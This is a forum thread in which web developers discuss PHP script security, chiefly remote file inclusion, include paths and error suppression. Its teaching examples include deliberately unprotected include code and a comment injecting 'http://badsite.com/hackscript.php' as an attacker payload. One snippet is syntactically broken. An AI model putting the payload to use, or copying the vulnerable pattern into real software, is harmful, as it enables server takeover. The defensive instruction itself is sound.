Protection in PHP Scripts :: Basic PHP Security information
MatthewHSE
Status: Contributor
Joined: 20 Jul 2004
Posts: 122
Location: Central Illinois, typically glued to a computer screen
Reply Quote
In a previous thread, "protection" in scripts was mentioned. I'm not familiar with that term, so it would be great to see a basic primer of just what it means and how to work in such protection.

The only thing I can think of is that "protection" equates to error handling, fault tolerance, and/or validating user input. Is that correct, or is protection a completely different issue?
Back to top
techAdmin
Status: Site Admin
Joined: 26 Sep 2003
Posts: 4126
Location: East Coast, West Coast? I know it's one of them.
Reply Quote
That's right. Protection means anticipating error, crack attempts,data validation, etc.

That's the hardest part of programming, making something sort of work is relatively easy, but making it relatively hack and error proof is really hard.

Places to check out:

phpsecurity.org

phpsec.org

And many other sites.

Any O'Reilly PHP book, Programming PHP by Rasmus Lerdorf for example has a nice introductory chapter on PHP security. Or if you really want to become a master, Essential PHP security. O'Reilly is the best in most cases.
Back to top
MatthewHSE
Status: Contributor
Joined: 20 Jul 2004
Posts: 122
Location: Central Illinois, typically glued to a computer screen
Reply Quote
I see. In that case, when you have time, would you be able to give a quick rundown of why the code I posted previously doesn't have much protection built in? I thought it was pretty tight myself, but of course I'd like to know about any holes, etc., it may have in it.
Back to top
techAdmin
Status: Site Admin
Joined: 26 Sep 2003
Posts: 4126
Location: East Coast, West Coast? I know it's one of them.
Reply Quote
In this case it was the javascript part I think. The php looks fine from what I can see, although you never know, suddenly one day some cracker somewhere figures out another hole. But since you are using hard coded file values it's a lot sofer.

Once scripts get more complex there are more places for error and validation problems to slip in.

One thing I do note however, as an experiment to learn ajax this is a great project, very useful, but as a practical solution to entering and checking an email address into a mailing list I'd go with straight php page submitting to itself, checking against a db, then spitting either a success or failure message out.

But as an ajax exercise it was definitely useful, I wouldn't use it for production purposes because it depends on javascript.

That's how you learn new stuff though, you create a problem and solve it, won't learn anything if you don't do that.
Back to top
MatthewHSE
Status: Contributor
Joined: 20 Jul 2004
Posts: 122
Location: Central Illinois, typically glued to a computer screen
Reply Quote
Yes, I'll definitely be rewriting that whole thing to use a database, although I think I'll try the Ajax technique in production for awhile just to see how it goes. I know its dependence on Javascript will mean some users won't get to use it, but around 95% + of my users have js turned on anyway. And since I'm writing the whole form with document.write, non-js users won't see it at all, so they won't run into any annoying errors, missing features, or malfunctions. (Or am I thinking all wrong with that?)

I'm glad to know protection is about what I thought it was. I'm almost paranoid about security, and validating data is always the first thing I do with user input. And of course I always follow the standard security policy of ONLY accepting data that I expect to receive - anything else gets thrown out right away.
Back to top
techAdmin
Status: Site Admin
Joined: 26 Sep 2003
Posts: 4126
Location: East Coast, West Coast? I know it's one of them.
Reply Quote
It's not paranoia, it's being smart about it.

Paranoia is being pointlessly afraid of something that exists as a likelihood only in your own mind.

I track every week new exploits running automated through the web, you can see them by 404 pages, I can always tell when a new script vulnerability is discovered, a while after automated bots scripts run through the web looking for those pages, xml.rpc for example on wordpress older versions was about 1 month ago.

I have one, won't say where it is, generated dynamic include paths, I forgot to check for one thing, then noticed a 404 + 500 internal server error reports suddenly on that site, took a look, and sure enough, I'd forgotten to protect the include by double checking that the file existed on the server before proceeding. Error condition in that case triggers a polite 'nice try' message to the would be hacker.

In that case the joke was on the potential cracker, since they assumed it was db driven but it uses only static flatfiles so all you can do is crash the page.

Email contact form scripts are also problematic, as are any improperly escaped and protected sql routines.

Being 'paranoid' is the smart way to program, in fact, you can just remove the word paranoid and replace it with 'properly careful and anticipating future attacks and server compromises before they happen'.

More rigorous protection include using php error reporting options to turn off all error output, which can frequently be used to find the actual server paths on the site.

Error detection and handling is a big part of programming, I'm not very good at it, I just have faith...LOL...
Back to top
MatthewHSE
Status: Contributor
Joined: 20 Jul 2004
Posts: 122
Location: Central Illinois, typically glued to a computer screen
Reply Quote
:: Quote ::
I'd forgotten to protect the include by double checking that the file existed on the server before proceeding.


I find that interesting. I won't ask you to divulge the site in question, but could you explain the concept a bit further? I never thought about checking for the presence of an include before - but then I've always hard-coded those up until now. In any case, how would the absence of the file be an opening for a hacker?
Back to top
jeffd
Status: Assistant
Joined: 04 Oct 2003
Posts: 594
Reply Quote
Here's a very general overview on security questions [called: The Six Dumbest Ideas in Computer Security], that's dealing with network security primarily, but take a look at the programming end of things too.

Especially relevant is number 3:

:: Quote ::
Let me put it to you in different terms: if "Penetrate and Patch" was effective, we would have run out of security bugs in Internet Explorer by now. What has it been? 2 or 3 a month for 10 years? If you look at major internet applications you'll find that there are a number that consistently have problems with security vulnerabilities. There are also a handful, like PostFix, Qmail, etc, that were engineered to be compartmented against themselves, with modularized permissions and processing, and - not surprisingly - they have histories of amazingly few bugs.

It's with some sadness that I have to point out that virtually all popular web software was written using the 'penetrate and patch' model, from phpbb, wordpress, on up.

That is, instead of never including new features until they have been heavily screened for security, they tend to throw new stuff onto these packages, then hope no problems show up, then patch the problems when they appear.

Number 6 covers the main reason for this:

:: Quote ::
IT executives seem to break down into two categories: the "early adopters" and the "pause and thinkers." Over the course of my career, I've noticed that dramatically fewer of the "early adopters" build successful, secure, mission-critical systems. This is because they somehow believe that "Action is Better Than Inaction" - i.e.: if there's a new whizzbang, it's better to install it right now than to wait, think about it, watch what happens to the other early adopters, and then deploy the technology once it's fully sorted-out and has had its first generation of experienced users.

In other words, think phpbb developers adding features because it seems 'cool'. Think remote avatars, remote file uploading, forum search, etc. These have been the main security issues on for example phpbb.

There have been many others, but almost all come from too many features added too fast with not enough testing and preplanning and security focus.

The real problem is it takes experience to do it right, and you can't get experience in most cases unless you do it wrong first.

Clearly some cases are out of your control, for example recently there was a php vulnerability that was out there for a while, known and not patched, not a lot you can do about that.

Not sure if this ties in with your question, but this is a fairly serious security guy, there are many others, so it gives you some idea of the mindset that's required to produce secure systems.

I'm not particularly good at that end of things, but I try.
Back to top
techAdmin
Status: Site Admin
Joined: 26 Sep 2003
Posts: 4126
Location: East Coast, West Coast? I know it's one of them.
Reply Quote
Nice read, good for general idea of security I'll admit.

For more precise security stuff, you can read various webmasterworld php security threads [google search].

Note that not everything in for example this thread is right, for example using .inc does not necessarily mean that hackers can read your .inc files, that's just plain wrong. Then there's this one, which gets into it even more thoroughly. As you can see, PHP security is not a trivial topic. And that's just one site, there's tons of stuff on php security, the main problem is that junior hackers and programmers don't bother reading up on it before starting to code away.

PHP is always placed within <?php .... ?> tags, whether on library files, php or inc. I like inc because it's easy to tell them apart from standard php files. Just a preference, makes no particular difference, if the server parses the .inc as php it's just another extension.

Set global include paths
A good observation is made in the first wmw thread I linked to about setting your apache include paths in .htaccess or httpd.conf. Let's say you set your include path in .htaccess to:
:: Code ::
php_value include_path ".:/usr/www/includes"
// while your actual website, publically accessible, lives here:
/usr/www/yoursite/
// in other words, when apache gets a request for index.htm, it sends it to:
/usr/www/yoursite/index.html

This means that all includes will use this as the base directory for the includes.

With one large exception: paths that start with , ftp://, or /, will get the include from that path. In other words, the include path is overridden if an absolute path to the root or another external site is given instead. This is a major thing you have to protect against.

Many hosters turn off the ability to access remote files with includes, but not all do. You can also override this yourself on a case by case basis.

Note that the includes folder set in that path is not accessible over the web. This is my absolute top pet peeve with most major web based apps, blogs, forums, whatever. Even shopping carts do this, which is totally inexcusable, since they should be as secure as possible.

So say you have
:: Code ::
$page = $_GET['page'];
include('pages/' . $page);

If somehow a hacker tries to get a remote script included, it will then looks maybe like this:

:: Code ::
$page = $_GET['page'] // hacker inserts: http://badsite.com/hackscript.php into 'page'
// which gets inserted into include:
include('pages/' . 'http://badsite.com/hackscript.php');
//which will call this non existent page:
/usr/www/includes . / . pages/ . http://badsite.com/hackscript.php
// which will trigger an include error, since that file does not exist on the server.

Note here, you set the include to 'pages/' . $path. If you remove this protection, you can see that the attacker script would run internally in your server. Not good. You can also append a ./ to the path, which means that it will look in the default include directory as the start point.

Chasing after the crackers
Sometimes people check for :// in the string, then hackers replace those with hexadecimal equivalents, then you have to check for hexadecimals in the string, and on it goes.

However, you can skip all that by just using:

:: Code ::
if ( file_exists ( $full_path ) )
{
  // do some stuff
}
else
{
  echo 'go away and leave our site alone';
}

as one example, this just stops execution right there if it doesn't exist on the server, you can create the whole path with
$full_path = get_include_path() . '/' . $path;

and so on. In other words, it's totally irrelevant what the cracker tries in that case, it's not going to be on your server no matter what, so it doesn't matter how tricky they try to get. This isn't to say they won't get in somehow or other, especially on a weak product like phpbb or wordpress or whatever. But for your own stuff, where you can follow proper security practices, you can do a lot better.

One of the main ways phpbb was attacked a year ago was using the get variable in the forum search string. They'd neglected to protect that, which allowed potential forum crackers to simply call a script from a remote site, run it, take over phpbb, and knock the forum off.

There's a few reasons this was possible, foremost is a decision, which is horrible coding and security practice, to make phpbb a one click install, basically.

Globals:: Don't use them
Global variables are always bad design in my opinion. It's easy to lose track of them, not using them was one of the very first things I learned in programming classes, and I never have since then. Globals = sloppy programming.

Bad security by design
Whereas all the includes should go beneath site root, non-accessible, they are fully exposed. This gives crackers direct access to any page they want to crack. Second, to make it easy to install, since many systems do not support .htaccess, they do not follow the overall site include path set in .htaccess, but basically hardcode that value into each page. This is bad practice, and done to make it easy to install.

Does this sound familiar? It should, this is the exact type of decision Microsoft makes for their Windows products.

Phpbb is a perfect example of what jeffd posted above, bad design leading to hacks leading to patches. I like phpbb, but I don't like the decisions they made to make it 'user friendly and easy to install'. That's a bad decision.

No template or include file should exist above site document root. That's my opinion. Include paths should always be set in .htaccess or httpd.conf, depending on your hosting privileges. These are like the abcs of security.

Protect all data that is modifiable by users, whether you realize it or not
No get query string should ever be able to call a remote file. No post value should ever be able to call a remote file in anyway.

These are the most common errors I see, and most are a direct result of catering to users on really bad hosters that give little or no rights to the users. Catering to that lowest denominator is a very bad idea.

I'm just using phpbb as an example, you can point to almost any major web based application, open or closed source, and find the same problems. Caused by the same mistake, trying to make something user friendly for newbies. Bad idea. Always a bad idea. This is why windows and internet explorer are fundamentally insecure. There's a certain irony in seeing open source projects that tend to be heavily MS critical do the same exact thing wrong.

And I'd note, I think as these things go, phpBB is quite a bit better coded than other apps I've looked at.

Error protection
Anyway, to answer your question, let's say you don't protect totally against bad includes, as in the case above. By not checking to see if the file exists, or by not blocking error output by for example using the '@' sign, like this:

:: Code ::
@include('pages/' . $page );
// or you can use a global switch:
error_reporting(0);
// set at  beginning of script turns all error reports off

For development, you can comment this out, although there's a big problem debugging errors users find of course, which is why I avoid that in general, though it's a good idea for more critical stuff in many ways.

If $page is invalid for whatever reason, rather than printing out your entire web path, in a php error message, path /usr/www/yoursite/includes/http://badsite/fred.php does not exist, it just does nothing.

While this is the end of this particular road for that cracker, they now know the path to your include folder, and the path to your server root. This is more information than they had before.

this is one example of protection. Personally, I'd rather put out code that can't be broken like this than use error suppression, but that's just a choice, and it's a mistake in many cases.

For a while, some of my sites returned an error message when they were hit by non windows or linux systems, for example. This was due to a simple mistake, and a lack of testing with real data. This was not good, needless to say. Putting real, significantly large scripts out, that interact with the web, is a good way to get familiar with what can happen.

BACKUP!!!
And of course, back up your stuff!!! You will fail at some point. How many times have I read webmasters who have lost their entire sites by hacking or server failure, back up routinely, it pays. Hopefully you'll never need to use your backups, but maybe you will.
Back to top
jeffd
Status: Assistant
Joined: 04 Oct 2003
Posts: 594
Reply Quote
Simple sample, copy this into a file, save it to some development site on your box, say the site is called site1, call this page in.php:

:: Code ::
<?php
$path = 'http://techpatterns.com/';
if ( file_exists( $path ) )
{
   include ( $path );
}
else
{
   echo 'bad, very bad, that\'s not nice';
}
?>

As you can see if you run this locally as site1/in.php, you will get the error message. The file does not exist on the local machine.

Now remove the protection:

:: Code ::
<?php
$path = 'http://techpatterns.com/';
include ( $path );
?>

and run it again, and you should see the home page of techpatterns.com. That means that any code contained in that page ran internally on your server, since it's been included and run by your script.

Again, most hosters block by default the ability to access remote files.

Now another version:
:: Code ::
<?php

$path = './' . 'http://techpatterns.com/';
include ( $path );
?>
// creates the error message:
Warning: main(./http://techpatterns.com/): failed to open stream: Invalid argument in c:\yoursites\site1\in.php on line 4

Warning:main(): Failed opening './http://techpatterns.com/' for inclusion (include_path='.;c:/yoursites/includes/') in c:\yoursites\site1\in.php on line 4

Notice here that the file was not included because you used ./, which tells it to use the current directory, and since you set the include path earlier, the current directory is 'includes'. Since no file named 'http://techpatterns.com/' exists in that directory, you get an include error. But you don't want that error, since that gave away some information, and is ugly, and not user friendly.

So you change the above to:
:: Code ::
<?php
$path = './' . 'http://techpatterns.com/';
if ( file_exists( $path ) )
{
   include ( $path );
}
else
{
   echo 'bad, very bad, that\'s not nice';

?>

and you get this output:
:: Code ::
bad, very bad, that's not nice
.

and that's it. No way the attacker can hit you from that particular vector. But they can get you many other ways, this simply covers case 1, the very simplest and easy to avoid case.
Back to top
Display posts from previous:   

All times are GMT - 8 Hours